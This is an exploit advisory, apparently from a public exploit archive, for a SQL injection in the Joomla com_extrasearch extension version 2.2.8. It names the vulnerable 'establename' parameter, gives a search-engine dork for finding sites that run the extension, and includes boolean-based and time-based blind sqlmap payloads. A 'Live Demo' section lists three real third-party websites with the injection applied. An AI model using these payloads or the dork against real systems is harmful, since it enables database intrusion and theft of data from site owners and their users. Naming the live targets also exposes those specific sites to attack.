######################
# Exploit Title : Joomla com_extrasearch SQL injection Vulnerability
# Exploit Author : howucan
# Website : http://howucan.gr
# Dork : inurl:/index.php?option=com_extrasearch establename
# Software link : http://www.joomlaboat.com/extra-search
# Software version : 2.2.8
# video : http://adf.ly/1cmGen
# Tested on: [ Parrot os 3.1 ]
# Date: 2016/07/31
#
######################
# [+] Poc :
######################
# Get Parameter establename Vulnerable To SQLi
#
http(s)://<host>/<joomla-path>/index.php?option=com_extrasearch&view=details&listing_id=15&Itemid=662&establename=themes(inject
here)
# [+] SQLmap Poc :
###############
#   Type: boolean-based blind
#   Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP
BY clause (MAKE_SET)
#   Payload:
option=com_extrasearch&view=details&listing_id=15&Itemid=662&establename=-5792"
OR MAKE_SET(5730=5730,3268) AND "OpLU"="OpLU
#
#   Type: AND/OR time-based blind
#   Title: MySQL >= 5.0.12 AND time-based blind
#   Payload:
option=com_extrasearch&view=details&listing_id=15&Itemid=662&establename=themes"
AND SLEEP(5) AND "bmqB"="bmqB
#
######################
# [+] Live Demo
#
http://www.joomlaboat.com/index.php?option=com_extrasearch&view=details&listing_id=15&Itemid=662&establename=themes%27

#
http://cursosoxford.com/index.php/en/?option=com_extrasearch&view=details&listing_id=6&Itemid=178&establename=calendar%27&returnto=aHR0cDovL2N1cnNvc294Zm9yZC5jb20vaW5kZXgucGhwL2VuLyNhNg==
#
http://tuesmeralda.com/en/?option=com_extrasearch&view=details&listing_id=37&Itemid=106&establename=catalog%27&returnto=aHR0cDovL3R1ZXNtZXJhbGRhLmNvbS9lcy9jb2xlY2Npb24tcGxhdGEtZXNtZXJhbGRhI2EzNw==
######################
# Salonika Punk Rock City
# PAOK G4
#######################